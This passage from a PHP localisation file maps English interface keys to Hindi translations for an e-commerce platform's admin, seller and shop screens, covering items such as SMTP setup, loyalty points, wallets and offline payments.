किए बिना चेकआउट प्रक्रिया को पूरा कर सकते हैं', 'if_enabled_users_can_receive_verification_codes_on_their_registered_email_addresses' => 'यदि सक्षम उपयोगकर्ता अपने पंजीकृत ईमेल पते पर सत्यापन कोड प्राप्त कर सकते हैं', 'if_enabled_users_can_receive_verification_codes_via_OTP_messages_on_their_registered_phone_numbers' => 'यदि सक्षम उपयोगकर्ता अपने पंजीकृत फोन नंबर पर ओटीपी संदेशों के माध्यम से सत्यापन कोड प्राप्त कर सकते हैं', 'if_enabled_users_will_receive_verification_codes_on_their_registered_email_addresses' => 'यदि सक्षम उपयोगकर्ता अपने पंजीकृत ईमेल पते पर सत्यापन कोड प्राप्त करेंगे', 'if_enabled_users_will_receive_verification_codes_on_their_registered_phone_numbers' => 'यदि सक्षम उपयोगकर्ता अपने पंजीकृत फोन नंबर पर सत्यापन कोड प्राप्त करेंगे', 'if_needed' => 'यदि ज़रूरत हो तो', 'if_not _double-check_your_SMTP_settings_and_try_again' => 'यदि अपनी SMTP सेटिंग्स को डबल-चेक नहीं करें और फिर से प्रयास करें', 'if_required' => 'यदि आवश्यक हुआ', 'if_sales_commission_is_disabled_here_the_system_default_commission_will_be_applied' => 'यदि बिक्री आयोग यहां अक्षम है, तो सिस्टम डिफ़ॉल्ट आयोग लागू किया जाएगा', 'if_successful _you_will_see_a_confirmation_message_indicating_that_the_connection_is_working_fine' => 'यदि सफल होने पर आप एक पुष्टिकरण संदेश देखेंगे जो यह दर्शाता है कि कनेक्शन ठीक काम कर रहा है', 'if_the_Customer_Loyalty_Point_option_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'यदि ग्राहक वफादारी बिंदु विकल्प इस खंड की सभी सेटिंग्स से ऊपर अक्षम है, तो अनुपलब्ध होगा', 'if_the_Customer_Wallet_option_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'यदि ग्राहक वॉलेट विकल्प इस खंड की सभी सेटिंग्स से ऊपर अक्षम है, तो अनुपलब्ध होगा', 'if_the_SMTP_connection_test_is_successful _you_can_now_enable_the_mail_configuration_services_by_toggling_the_switch_to_ ON ' => 'यदि SMTP कनेक्शन परीक्षण सफल है तो आप अब स्विच को टॉगल करके मेल कॉन्फ़िगरेशन सेवाओं को सक्षम कर सकते हैं', 'if_the_shipping_responsibility_is_inhouse_and_product_wise_shipping_is_activated_then_this_function_will_work' => 'यदि शिपिंग जिम्मेदारी घर में है और उत्पाद वार शिपिंग सक्रिय है तो यह फ़ंक्शन काम करेगा', 'if_thermal_printer_is_ready' => 'यदि थर्मल प्रिंटर तैयार है', 'if_you_change_addon_status' => 'यदि आप addon स्थिति बदलते हैं', 'if_you_change_from_on_theme_to_another_there_are_certain_changes_that_you_need_to_maintain_and_setup_data.' => 'यदि आप थीम से दूसरे में बदलते हैं तो कुछ ऐसे परिवर्तन होते हैं जिन्हें आपको डेटा को बनाए रखने और सेटअप करने की आवश्यकता होती है।', 'if_you_change_theme_from_theme_setup_these_banners_will_not_be_shown_in_changed_theme._You_have_upload_all_the_banners_over_again _according_to_the_new_theme_ratio_and_sizes._If_you_switch_back_to_' => 'यदि आप थीम सेटअप से थीम बदलते हैं तो इन बैनर को परिवर्तित थीम में नहीं दिखाया जाएगा। आपने नए थीम अनुपात और आकारों के अनुसार सभी बैनर को फिर से अपलोड किया है। यदि आप वापस स्विच करते हैं', 'if_you_need_help' => 'अगर तुम्हे सहायता की जरुरत है', 'if_you_require_any_assistance_or_have_feedback_or_suggestions_about_our_site_you_can_email_us_at' => 'यदि आपको कोई सहायता की आवश्यकता है या हमारी साइट के बारे में प्रतिक्रिया या सुझाव है तो आप हमें ईमेल कर सकते हैं', 'if_you_shift_in_another_theme' => 'यदि आप किसी अन्य विषय में शिफ्ट करते हैं', 'if_you_want_to_add_fund_to_your_wallet_then_click_add_fund_button' => 'यदि आप अपने वॉलेट में फंड जोड़ना चाहते हैं तो फंड बटन जोड़ें पर क्लिक करें', 'if_you`re_not_sure_where_to_find_these_details _check_the_email_provider`s_documentation_or_support_resources_for_guidance' => 'यदि आपको यकीन नहीं है कि इन विवरणों को कहां से खोजा जाए तो मार्गदर्शन के लिए ईमेल प्रदाता के दस्तावेज या समर्थन संसाधनों की जांच करें', 'if_you`re_unsure_about_the_SMTP_settings _contact_your_email_service_provider_or_IT_administrator_for_assistance' => 'यदि आप SMTP सेटिंग्स के बारे में अनिश्चित हैं, तो सहायता के लिए अपने ईमेल सेवा प्रदाता या आईटी व्यवस्थापक से संपर्क करें', 'if_âFlatâ _discount_amount_will_be_set_as_fixed_amount._If_âPercentageâ _discount_amount_will_be_set_as_percentage.' => 'यदि  flatâ डिस्काउंट राशि निश्चित राशि के रूप में सेट की जाएगी। यदि  प्रतिशत की छूट राशि प्रतिशत के रूप में सेट की जाएगी।', 'iframe_id' => 'इफ्रेम आईडी', 'im_not_a_robot_checkbox' => 'Im एक रोबोट चेकबॉक्स नहीं है', 'im_not_a_robot_checkbox ' => 'Im एक रोबोट चेकबॉक्स नहीं है', 'image' => 'छवि', 'image_Upload' => 'छवि अपलोड', 'image_format' => 'छवि प्रारूप', 'image_ratio' => 'छवि अनुपात', 'image_ratio_should_be' => 'छवि अनुपात होना चाहिए', 'image_ration' => 'छवि राशन', 'image_size' => 'छवि का आकार', 'image_size_must_be_within' => 'छवि का आकार भीतर होना चाहिए', 'image_type_must_be_within' => 'छवि प्रकार के भीतर होना चाहिए', 'images' => 'इमेजिस', 'important' => 'महत्वपूर्ण', 'in' => 'में', 'in-Hous_Products' => 'आवारा उत्पाद', 'in-House' => 'में-घर', 'in-House_Earning' => 'घर की कमाई', 'in-House_Shop' => 'घर की दुकान', 'in-Stock' => 'स्टॉक में', 'in-house' => 'में-घर', 'in-house_Products' => 'इन-हाउस उत्पाद', 'in-house_earning' => 'घर की कमाई', 'in_House' => 'घर में', 'in_House Orders' => 'घर के आदेशों में', 'in_House Products' => 'घर के उत्पादों में', 'in_House_Order' => 'हाउस ऑर्डर में', 'in_House_Product_List' => 'घर के उत्पाद सूची में', 'in_House_earning' => 'घर की कमाई में', 'in_Stock' => 'स्टॉक में', 'in_about_section_select' => 'खंड का चयन करें', 'in_compare' => 'तुलना में', 'in_minute' => 'मिनट में', 'in_seconds' => 'कुछ लम्हों में', 'in_stock' => 'स्टॉक में', 'in_the_system' => 'प्रणाली में', 'in_their_shops' => 'उनकी दुकानों में', 'in_these_cases_you_have_to_setup_data_for_those_features_after_changing_the_theme.' => 'इन मामलों में आपको थीम को बदलने के बाद उन सुविधाओं के लिए डेटा सेटअप करना होगा।', 'inactive' => 'निष्क्रिय', 'inactive_Products' => 'निष्क्रिय उत्पाद', 'inbox' => 'इनबॉक्स', 'include' => 'शामिल करना', 'include_with_product' => 'उत्पाद के साथ शामिल करें', 'incomplete_bank_info' => 'अपूर्ण बैंक जानकारी', 'incomplete_info' => 'अपूर्ण जानकारी', 'info' => 'जानकारी', 'info_inquiry' => 'जानकारी जांच', 'information' => 'जानकारी', 'inhouse' => 'इन-हाउस', 'inhouse_Sales' => 'घर की बिक्री', 'inhouse_orders_only' => 'इनहाउस ऑर्डर केवल', 'inhouse_product' => 'घर का उत्पाद', 'inhouse_product_sale Report' => 'इनहाउस उत्पाद बिक्री रिपोर्ट', 'inhouse_products' => 'इनहाउस प्रोडक्ट्स', 'inhouse_sale' => 'इनहाउस बिक्री', 'inhouse_shipping' => 'इनहाउस शिपिंग', 'inhouse_shipping_method' => 'इनहाउस शिपिंग विधि', 'inhouse_shop' => 'घर की दुकान', 'input if you want to change' => 'यदि आप बदलना चाहते हैं तो इनपुट', 'input_Data' => 'इनपुट डेटा', 'input_Field_Type' => 'इनपुट फ़ील्ड प्रकार', 'input_field_Name' => 'इनपुट फ़ील्ड नाम', 'input_png_or_jpg' => 'इनपुट पीएनजी या जेपीजी', 'inquiry' => 'जाँच करना', 'instagram' => 'Instagram', 'installments' => 'किश्तों', 'instruction_will_be_available_very_soon' => 'निर्देश बहुत जल्द उपलब्ध होगा', 'instructions' => 'निर्देश', 'integration_id' => 'एकीकरण आईडी', 'into_currency' => 'मुद्रा में', 'invalid_access' => 'अमान्य अभिगम', 'invalid_customer_data' => 'अमान्य ग्राहक आंकड़ा', 'invalid_date_range' => 'अमान्य दिनांक सीमा', 'invalid_email_address' => 'अमान्य ईमेल पता', 'invalid_theme!' => 'अमान्य थीम!', 'invalid_user' => 'अमान्य उपयोगकर्ता', 'invite_Your_Friends_&_Businesses' => 'अपने दोस्तों और व्यवसायों को आमंत्रित करें', 'invite_your_friends_&_businesses' => 'अपने दोस्तों और व्यवसायों को आमंत्रित करें', 'invoice' => 'चालान', 'invoice_to' => 'बीजक बनाना', 'is' => 'है', 'is_Required' => 'आवश्यक है', 'issuer' => 'जारीकर्ता', 'it is already refunded you can not change it!!' => 'यह पहले से ही वापस कर दिया गया है आप इसे नहीं बदल सकते हैं !!', 'it is already refunded you can not change it!!' => 'यह पहले से ही वापस कर दिया गया है आप इसे नहीं बदल सकते हैं !!', 'it_does_not_represent_the_Play_Store_or_App_Store_version' => 'यह प्ले स्टोर या ऐप स्टोर संस्करण का प्रतिनिधित्व नहीं करता है', 'item' => 'वस्तु', 'item Details' => 'आइटम विवरण', 'item_Details' => 'आइटम विवरण', 'item_description' => 'आइटम विवरण', 'item_details' => 'आइटम विवरण', 'item_discount' => 'मद की छूट', 'item_has_been_added_in_your_cart' => 'आइटम आपकी गाड़ी में जोड़ा गया है', 'item_has_been_removed_from_cart' => 'आइटम को गाड़ी से हटा दिया गया है', 'item_has_been_removed_from_cart ' => 'आइटम को गाड़ी से हटा दिया गया है', 'item_price' => 'आइटम की कीमत', 'items' => 'सामान', 'items found' => 'वस्तु मिली', 'items_Price' => 'वस्तुओं की कीमत', 'items_found' => 'वस्तु मिली', 'jobs' => 'नौकरियां', 'john_doe' => 'जॉन डो', 'joined' => 'में शामिल हो गए', 'joined_At' => 'में शामिल हो गया', 'just' => 'अभी', 'key' => 'चाबी', 'key_id' => 'प्रमुख आईडी', 'key_removed_successfully' => 'कुंजी को सफलतापूर्वक हटा दिया गया', 'key_translated_successfully' => 'कुंजी का सफलतापूर्वक अनुवाद किया गया', 'label' => 'लेबल', 'language' => 'भाषा', 'language_Translate' => 'भाषा अनुवाद', 'language_content_table' => 'भाषा सामग्री तालिका', 'language_setting' => 'भाषा सेटिंग', 'language_table' => 'भाषा तालिका', 'languages' => 'बोली', 'last' => 'अंतिम', 'last_Name' => 'उपनाम', 'last_Updated_Stock' => 'अंतिम अद्यतन स्टॉक', 'last_name' => 'उपनाम', 'last_updated' => 'आखरी अपडेट', 'latest' => 'नवीनतम', 'latest_product' => 'नवीनतम उत्पाद', 'latest_products' => 'नवीनतम उत्पाद', 'latitude' => 'अक्षांश', 'leave_a_Message' => 'एक संदेश छोड़ें', 'leave_a_comment' => 'एक टिप्पणी छोड़ें', 'left' => 'बाएं', 'left sidebar' => 'बाईं साइडबार', 'let_me_check' => 'मुझे जाँच करने दो', 'license' => 'लाइसेंस', 'light' => 'रोशनी', 'like_for_BD_880' => 'जैसे बीडी 880 के लिए', 'limit' => 'आप LIMIT', 'limit_for_same_user' => 'एक ही उपयोगकर्ता के लिए सीमा', 'limit_for_same_user_is_required' => 'एक ही उपयोगकर्ता के लिए सीमा की आवश्यकता है', 'limit_for_same_user_is_required!' => 'एक ही उपयोगकर्ता के लिए सीमा आवश्यक है!', 'limited_Sotcks' => 'सीमित sotcks', 'limited_Stock' => 'सीमित स्टॉक', 'limited_Stocks' => 'सीमित स्टॉक', 'limited_stock' => 'सीमित स्टॉक', 'link' => 'जोड़ना', 'linkedIn' => 'Linkedin', 'linked_orders' => 'जुड़े आदेश', 'liqpay' => 'लिकपे', 'list' => 'सूची', 'list_of_hold_orders' => 'होल्ड ऑर्डर की सूची', 'live' => 'रहना', 'live_chat' => 'सीधी बातचीत', 'loader_gif' => 'लोडर जिफ', 'loading_Gif' => 'लोडिंग जिफ', 'location' => 'जगह', 'location_Data' => 'जगह की जानकारी', 'location_data' => 'जगह की जानकारी', 'login' => 'लॉग इन करें', 'login_Url_Setup' => 'लॉगिन URL सेटअप', 'login_first' => 'पहले प्रवेश करो', 'login_first_for_next_steps' => 'अगले चरणों के लिए पहले लॉगिन करें', 'login_for_add_to_cart' => 'कार्ट में जोड़ने के लिए लॉगिन करें', 'login_successful' => 'लॉग इन सफल', 'login_to_your_account' => 'अपने अकाउंट में लॉग इन करें', 'login_to_your_account.' => 'अपने अकाउंट में लॉग इन करें।', 'login_to_your_seller_account' => 'अपने विक्रेता खाते में लॉगिन करें', 'login_to_your_seller_account.' => 'अपने विक्रेता खाते में लॉगिन करें।', 'logo' => 'प्रतीक चिन्ह', 'logout' => 'लॉग आउट', 'longitude' => 'देशान्तर', 'low' => 'कम', 'low_high' => 'उच्च निम्न', 'low_to_High_Price' => 'उच्च कीमत से कम', 'low_to_high_price' => 'उच्च कीमत से कम', 'lowest_Products' => 'सबसे कम उत्पाद', 'loyalty point' => 'वफादारी बिंदु', 'loyalty point transa...' => 'वफादारी बिंदु ट्रांसका ...', 'loyalty_Point_Earn_on_Each_Order' => 'वफादारी बिंदु प्रत्येक आदेश पर कमाते हैं', 'loyalty_Points' => 'वफादारी अंक', 'loyalty_point' => 'वफादारी बिंदु', 'loyalty_point_history' => 'वफादारी बिंदु इतिहास', 'mail' => 'मेल', 'mail_Config' => 'डाक विन्यास', 'mail_config' => 'डाक विन्यास', 'mail_configuration' => 'डाक विन्यास', 'mail_received_successfully' => 'मेल सफलतापूर्वक प्राप्त हुआ', 'mail_template' => 'मेल टेम्पलेट', 'mail_us' => 'हमें मेल करें', 'mailer_name' => 'मेलर नाम', 'main' => 'मुख्य', 'main_Banner' => 'मुख्य बैनर', 'main_Section_Banner' => 'मुख्य धारा बैनर', 'main_banner_form' => 'मुख्य बैनर रूप', 'maintenance_mode' => 'रखरखाव मोड', 'maintenance_mode_activated_for_others_you_can_update_now' => 'रखरखाव मोड दूसरों के लिए सक्रिय आप अब अपडेट कर सकते हैं', 'make_sure_to_check' => 'जांच करना सुनिश्चित करें', 'manage_deliveries' => 'डिलीवरी का प्रबंधन करें', 'map_api_hint' => 'NB=> क्लाइंट कुंजी को मानचित्र जावास्क्रिप्ट एपीआई सक्षम करना चाहिए और आप इसे HTTP रेफरी के साथ प्रतिबंधित कर सकते हैं। सर्वर कुंजी में स्थान API कुंजी सक्षम होना चाहिए और आप इसे IP के साथ प्रतिबंधित कर सकते हैं।', 'map_api_hint_2' => 'मैप एपीआई संकेत 2', 'map_api_key' => 'मैप एपीआई कुंजी', 'marketing' => 'विपणन', 'marketing section' => 'विपणन अनुभाग', 'marketing_section' => 'विपणन अनुभाग', 'master_card_number' => 'मास्टर कार्ड नंबर', 'max' => 'अधिकतम', 'maximum Login hit' => 'अधिकतम लॉगिन हिट', 'maximum OTP hit' => 'अधिकतम ओटीपी हिट', 'maximum discount' => 'अधिकतम छूट', 'maximum_Add_Fund_Amount' => 'अधिकतम जोड़ें निधि राशि', 'maximum_bonus' => 'शानदार अच्छा', 'maximum_discount' => 'अधिकतम छूट', 'maximum_discount ($)' => 'अधिकतम छूट ($)', 'maximum_file_size' => 'अधिकतम फ़ाइल आकार', 'maximum_quantity_270' => 'अधिकतम मात्रा 270', 'maximum_size' => 'अधिकतम आकार', 'measurement_ID' => 'माप आईडी', 'medium' => 'मध्यम', 'mercadopago' => 'मर्कडोपैगो', 'merchantEmail' => 'व्यापारी', 'merchant_Email' => 'व्यापारी ईमेल', 'merchant_ID' => 'व्यापारी आइडी', 'merchant_code' => 'Merchant code', 'message' => 'संदेश', 'message_from_delivery_man' => 'डिलीवरी मैन से संदेश', 'message_from_seller' => 'विक्रेता से संदेश', 'messages' => 'संदेशों', 'messaging_sender_id' => 'मैसेजिंग प्रेषक आईडी', 'messaging_service_sid' => 'मैसेजिंग सर्विस सिड', 'messenger' => 'मैसेंजर', 'meta_Description' => 'मेटा विवरण', 'meta_Image' => 'मेटा छवि', 'meta_Title' => 'मेटा शीर्षक', 'meta_description' => 'मेटा विवरण', 'meta_image' => 'मेटा छवि', 'meta_title' => 'मेटा शीर्षक', 'method' => 'तरीका', 'method_fields' => 'विधि क्षेत्र', 'method_name' => 'विधि नाम', 'methods' => 'तरीकों', 'middle' => 'मध्य', 'min' => 'मिन', 'minimum point for convert to currency is =>' => 'मुद्रा में परिवर्तित करने के लिए न्यूनतम बिंदु है=>', 'minimum purchase' => 'न्यूनतम खरीद', 'minimum_' => 'न्यूनतम', 'minimum_8_characters_long' => 'न्यूनतम 8 वर्ण लंबे', 'minimum_Add_Fund_Amount' => 'न्यूनतम जोड़ें निधि राशि', 'minimum_Customer_App_Version' => 'न्यूनतम ग्राहक ऐप संस्करण', 'minimum_Deliveryman_App_Version' => 'न्यूनतम डिलीवरीमैन ऐप संस्करण', 'minimum_Order_Amount' => 'न्यूनतम आदेश राशि', 'minimum_Point_Required_To_Convert' => 'परिवर्तित करने के लिए आवश्यक न्यूनतम बिंदु', 'minimum_Seller_app_version' => 'न्यूनतम विक्रेता ऐप संस्करण', 'minimum_add_amount' => 'न्यूनतम ऐड राशि', 'minimum_amount_can_not_be_greater_than_maximum_amount' => 'न्यूनतम राशि अधिकतम राशि से अधिक नहीं हो सकती है', 'minimum_order_amount' => 'न्यूनतम आदेश राशि', 'minimum_order_qty' => 'न्यूनतम आदेश qty', 'minimum_order_quantity' => 'न्यूनतम आदेश मात्रा', 'minimum_order_quantity_cannot_be_less_than' => 'Minimum order quantity cannot be less than', 'minimum_order_quantity_cannot_be_less_than_' => 'न्यूनतम आदेश मात्रा से कम नहीं हो सकता है', 'minimum_point_for_convert_to_currency_is =>' => 'मुद्रा में परिवर्तित करने के लिए न्यूनतम बिंदु है=>', 'minimum_point_to_transfer' => 'हस्तांतरण के लिए न्यूनतम बिंदु', 'minimum_purchase' => 'न्यूनतम खरीद', 'minimum_purchase ($)' => 'न्यूनतम खरीद ($)', 'minimum_purchase_is_required' => 'न्यूनतम खरीद आवश्यक है', 'minimum_purchase_is_required!' => 'न्यूनतम खरीद की आवश्यकता है!', 'minimum_stock_limit_for_warning' => 'चेतावनी के लिए न्यूनतम स्टॉक सीमा', 'minutes' => 'मिनट', 'mobile_no' => 'मोबाइल नहीं है', 'mobile_number' => 'मोबाइल नंबर', 'module' => 'मापांक', 'module_permission' => 'मॉड्यूल अनुमति', 'modules' => 'मॉड्यूल', 'money_back_guarantee' => 'पैसे वापस गारंटी', 'money_back_gurranty' => 'पैसा वापस', 'more' => 'अधिक', 'more_From_The_Store' => 'स्टोर से अधिक', 'more_stores' => 'अधिक भंडार', 'most favorite' => 'सबसे पसंदीदा', 'most-demanded_product_deleted_successfully' => 'अधिकांश-डिमैंडेड उत्पाद सफलतापूर्वक हटा दिया गया', 'most-favorite' => 'सबसे पसंदीदा', 'most_Popular_Stores' => 'सबसे लोकप्रिय स्टोर', 'most_demanded' => 'सबसे अधिक मांग', 'most_demanded_product' => 'सबसे अधिक मांग वाला उत्पाद', 'most_demanded_product_update_successfully' => 'सबसे अधिक मांग की गई उत्पाद अद्यतन सफलतापूर्वक', 'most_demanded_table' => 'सबसे मांग की गई मेज', 'most_favorite' => 'सबसे पसंदीदा', 'most_loved' => 'सबसे ज्यादा प्यारे', 'most_popular_products' => 'सबसे लोकप्रिय उत्पाद', 'most_rated_products' => 'अधिकांश रेटेड उत्पाद', 'most_searching' => 'सबसे खोज', 'most_visited_categories' => 'सबसे अधिक देखी जाने वाली श्रेणियां', 'msg91_sms' => 'MSG91 एसएमएस', 'mtemporary_close' => 'Mtemporary Close', 'multi_vendor' => 'बहु विक्रेता', 'multiple_zip_codes_can_be_inputted_by_comma_separating_or_pressing_enter_button' => 'कई ज़िप कोड को कॉमा द्वारा अलग या एंटर बटन दबाने से इनपुट किया जा सकता है', 'multiply_with_QTY' => 'QTY के साथ गुणा करें', 'must on' => 'पर होना चाहिए', 'must_on' => 'पर होना चाहिए', 'must_upload_colour_wise_images_first._Colour_is_shown_in_the_image_section_top_right' => 'पहले रंग बुद्धिमान चित्र अपलोड करना चाहिए। रंग छवि अनुभाग शीर्ष दाईं ओर दिखाया गया है', 'must_upload_colour_wise_images_first._Colour_is_shown_in_the_image_section_top_right.' => 'पहले रंग बुद्धिमान चित्र अपलोड करना चाहिए। रंग छवि अनुभाग शीर्ष दाएं में दिखाया गया है।', 'my product' => 'मेरा उत्पाद', 'my_Order' => 'मेरे आदेश', 'my_Order_List' => 'मेरी आदेश सूची', 'my_Wallet' => 'मेरा बटुआ', 'my_address' => 'मेरा पता', 'my_bank_info' => 'मेरी बैंक जानकारी', 'my_cart' => 'मेरी गाड़ी', 'my_compare_list' => 'मेरी तुलना सूची', 'my_loyalty_point' => 'मेरी वफादारी बिंदु', 'my_order' => 'मेरे आदेश', 'my_order_details' => 'मेरा आदेश विवरण', 'my_profile' => 'मेरी प्रोफाइल', 'my_shop' => 'मेरी दुकान', 'my_shop_info' => 'मेरी दुकान की जानकारी', 'my_wallet' => 'मेरा बटुआ', 'my_wishlist' => 'मेरी इच्छा सूची', 'my_wishlists' => 'मेरी विशलिस्ट', 'name' => 'नाम', 'nav_menu' => 'Nav menu', 'need_product_approval' => 'उत्पाद अनुमोदन की आवश्यकता है', 'negative' => 'नकारात्मक', 'neutral' => 'तटस्थ', 'new' => 'नया', 'new product' => 'नए उत्पाद', 'new product 2023' => 'नया उत्पाद 2023', 'new shop digital product' => 'नई दुकान डिजिटल उत्पाद', 'new_Category' => 'नई श्रेणी', 'new_Product' => 'नए उत्पाद', 'new_Products' => 'नये उत्पाद', 'new_Products_Requests' => 'नए उत्पाद अनुरोध', 'new_arrival' => 'नया आगमन', 'new_arrivals' => 'नवागन्तुक', 'new_language' => 'नई भाषा', 'new_notification' => 'नई अधिसूचना', 'new_order' => 'नए आदेश', 'new_password' => 'नया पासवर्ड', 'new_product' => 'नए उत्पाद', 'new_seller' => 'नया विक्रेता', 'new_shipping_cost' => 'नई शिपिंग लागत', 'newsletter' => 'समाचार पत्रिका', 'neww seller product' => 'Neww विक्रेता उत्पाद', 'nexmo_sms' => 'नेक्समो एसएमएस', 'next' => 'अगला', 'nid' => 'नहीं', 'no' => 'नहीं', 'no more review ' => 'कोई और समीक्षा नहीं', 'no more review remain to load' => 'कोई और समीक्षा लोड करने के लिए बनी हुई है', 'no.' => 'नहीं।', 'no_' => 'नहीं', 'no_Account' => 'खाता नहीं', 'no_Color' => 'रंग नहीं', 'no_Rating' => 'कोई रेटिंग नहीं', 'no_account' => 'खाता नहीं', 'no_account_Sign_up_now' => 'अब कोई खाता साइन अप नहीं है', 'no_address_is_saved' => 'कोई पता सहेजा नहीं गया है', 'no_attachment_found' => 'कोई लगाव नहीं मिला', 'no_billing_address_found' => 'कोई बिलिंग पता नहीं मिला', 'no_color' => 'रंग नहीं', 'no_comment_found' => 'कोई टिप्पणी नहीं मिली', 'no_conversation_found' => 'कोई बातचीत नहीं मिली', 'no_country_found' => 'कोई देश नहीं मिला', 'no_country_to_deliver' => 'कोई देश देने के लिए नहीं', 'no_customer_found' => 'कोई ग्राहक नहीं मिला', 'no_data_found' => 'डाटा प्राप्त नहीं हुआ', 'no_data_to_found' => 'कोई डेटा नहीं मिला', 'no_data_to_show' => 'दिखाने के लिए कोई डेटा नहीं', 'no_delivery_man_assigned' => 'कोई डिलीवरी मैन सौंपा गया', 'no_delivery_man_assigned_yet' => 'कोई डिलीवरी मैन अभी तक असाइन नहीं किया गया है', 'no_discount' => 'कोई छूट नहीं', 'no_items_in_basket' => 'टोकरी में कोई आइटम नहीं', 'no_location_found' => 'कोई स्थान नहीं मिला', 'no_message_available' => 'कोई संदेश उपलब्ध नहीं है', 'no_more_review_remain_to_load' => 'कोई और समीक्षा लोड करने के लिए बनी हुई है', 'no_order_found' => 'कोई आदेश नहीं मिला', 'no_rating' => 'कोई रेटिंग नहीं', 'no_review' => 'कोई समीक्षा नहीं', 'no_shipping_address_found' => 'कोई शिपिंग पता नहीं मिला', 'no_shipping_method_selected' => 'कोई शिपिंग विधि चयनित नहीं', 'no_similar_products_found' => 'कोई समान उत्पाद नहीं मिला', 'no_thanks' => 'जी नहीं, धन्यवाद', 'no_transaction_found' => 'कोई लेनदेन नहीं मिला', 'no_zip_code_found' => 'कोई ज़िप कोड नहीं मिला', 'not' => 'नहीं', 'not match' => 'मेल नहीं करता', 'not_assign_yet' => 'अभी तक असाइन नहीं', 'not_assigned' => 'सौंपा नहीं गया है', 'not_available' => 'उपलब्ध नहीं है', 'not_found' => 'नहीं मिला', 'not_found_anything' => 'कुछ भी नहीं मिला', 'not_match' => 'मेल नहीं करता', 'not_reviewed_yet' => 'अभी तक समीक्षा नहीं की', 'note' => 'टिप्पणी', 'note_from_seller' => 'विक्रेता से नोट', 'notification' => 'अधिसूचना', 'notification deleted successfully' => 'अधिसूचना सफलतापूर्वक हटा दी गई', 'notification_count' => 'अधिसूचना गणना', 'notification_deleted_successfully' => 'अधिसूचना सफलतापूर्वक हटा दी गई', 'notifications' => 'अधिसूचना', 'notificatios' => 'अधिसूचना', 'notify_All_the_Sellers' => 'सभी विक्रेताओं को सूचित करें', 'now' => 'अब', 'now_copy' => 'अब कॉपी', 'now_go_to' => 'अब जाओ', 'now_you_can_login' => 'अब आप लॉगिन कर सकते हैं', 'now_youâll_be_successfully_able_to_use_the_addons_for_your_6Valley_website' => 'अब आप अपनी 6valley वेबसाइट के लिए Addons का उपयोग करने में सक्षम होंगे', 'now_youâll_be_successfully_able_to_use_the_theme_for_your' => 'अब आप सफलतापूर्वक अपने लिए थीम का उपयोग करने में सक्षम होंगे', 'now_youâll_be_successfully_able_to_use_the_theme_for_your_6Valley_website' => 'अब आप अपनी 6valley वेबसाइट के लिए थीम का उपयोग करने में सक्षम होंगे', 'number' => 'संख्या', 'oR_SHARE' => 'या साझा करें', 'oder_Transaction_Statement' => 'ओडर लेन -देन विवरण', 'of' => 'का', 'off' => 'बंद', 'offer_ends_in' => 'में प्रस्ताव समाप्त होता है', 'offers' => 'ऑफर', 'offers_&_Deals' => 'प्रस्ताव और सौदे', 'offers_and_events' => 'ऑफ़र और इवेंट्स', 'office' => 'कार्यालय', 'offline' => 'ऑफलाइन', 'offline payment' => 'ऑफ़लाइन अदायगी', 'offline_Payment' => 'ऑफ़लाइन अदायगी', 'offline_Payment_Method' => 'ऑफ़लाइन भुगतान विधि', 'offline_Payment_Methods' => 'ऑफ़लाइन भुगतान विधियाँ', 'offline_Payment_allows_customers_to_use_external_payment_methods._They_must_share_payment_details_with_the_seller_afterward._Admin_can_set_whether_customers_can_make_offline_payments_by_enabling/disabling_this_button. ' => 'ऑफ़लाइन भुगतान ग्राहकों को बाहरी भुगतान विधियों का उपयोग करने की अनुमति देता है। उन्हें बाद में विक्रेता के साथ भुगतान विवरण साझा करना होगा। व्यवस्थापक सेट कर सकते हैं कि क्या ग्राहक इस बटन को सक्षम/अक्षम करके ऑफ़लाइन भुगतान कर सकते हैं।', 'offline_Payments' => 'ऑफ़लाइन अदायगी', 'offline_payment' => 'ऑफ़लाइन अदायगी', 'offline_payment_method_added_successfully' => 'ऑफ़लाइन भुगतान विधि सफलतापूर्वक जोड़ी गई', 'offline_payment_method_delete_successfully' => 'ऑफ़लाइन भुगतान विधि सफलतापूर्वक हटाएं', 'offline_payment_method_not_found' => 'ऑफ़लाइन भुगतान विधि नहीं मिली', 'offline_payment_method_update_successfully' => 'ऑफ़लाइन भुगतान विधि अद्यतन सफलतापूर्वक', 'offline_payments' => 'ऑफ़लाइन अदायगी', 'offline_seller' => 'ऑफ़लाइन विक्रेता', 'ok' => 'ठीक है', 'old' => 'पुराना', 'on' => 'पर', 'on_product' => 'उत्पाद पर', 'on_vacation' => 'छुट्टी पर', 'on_vacation_mode' => 'अवकाश मोड पर', 'once_deleted_you_will_not_be_able_to_recover_this' => 'एक बार हटाए जाने के बाद आप इसे ठीक नहीं कर पाएंगे', 'once_you_delete' => 'एक बार जब आप हटाते हैं', 'once_you_have_downloaded_and_filled_the_format_file' => 'एक बार जब आप डाउनलोड कर लेते हैं और प्रारूप फ़ाइल भरते हैं', 'one_step_ahead' => 'एक कदम आगे', 'one_time_password' => 'एक बारी पासवर्ड', 'ongoing' => 'चल रहे', 'ongoing_Orders' => 'चल रहे आदेश', 'online_Shopping' => 'ऑनलाइन खरीदारी', 'online_seller' => 'ऑनलाइन विक्रेता', 'online_shopping' => 'ऑनलाइन खरीदारी', 'only_Admin_can_create_an_account_for_any_seller' => 'केवल व्यवस्थापक किसी भी विक्रेता के लिए एक खाता बना सकता है', 'only_available_when_order_is_out_for_delivery' => 'केवल तब उपलब्ध है जब ऑर्डर डिलीवरी के लिए बाहर हो', 'only_earning_point_can_converted_to_wallet_money' => 'केवल कमाई बिंदु बटुए के पैसे में परिवर्तित हो सकता है', 'only_the_Admin_Panel_&_Seller_Panel_will_be_functional' => 'केवल व्यवस्थापक पैनल और विक्रेता पैनल कार्यात्मक होगा', 'open' => 'खुला', 'open_your_and_start_selling.' => 'अपना खोलें और बेचना शुरू करें।', 'open_your_shop_and_start_selling.' => 'अपनी दुकान खोलें और बेचना शुरू करें।', 'optional' => 'वैकल्पिक', 'optional please provide embed link not direct link' => 'वैकल्पिक कृपया एम्बेड लिंक प्रदान करें प्रत्यक्ष लिंक नहीं', 'optional please provide embed link not direct link.' => 'वैकल्पिक कृपया एम्बेड लिंक प्रदान करें प्रत्यक्ष लिंक नहीं।', 'optional please provide embed link not direct link' => 'वैकल्पिक कृपया एम्बेड लिंक प्रदान करें प्रत्यक्ष लिंक नहीं', 'optional please provide embed link not direct link.' => 'वैकल्पिक कृपया एम्बेड लिंक प्रदान करें प्रत्यक्ष लिंक 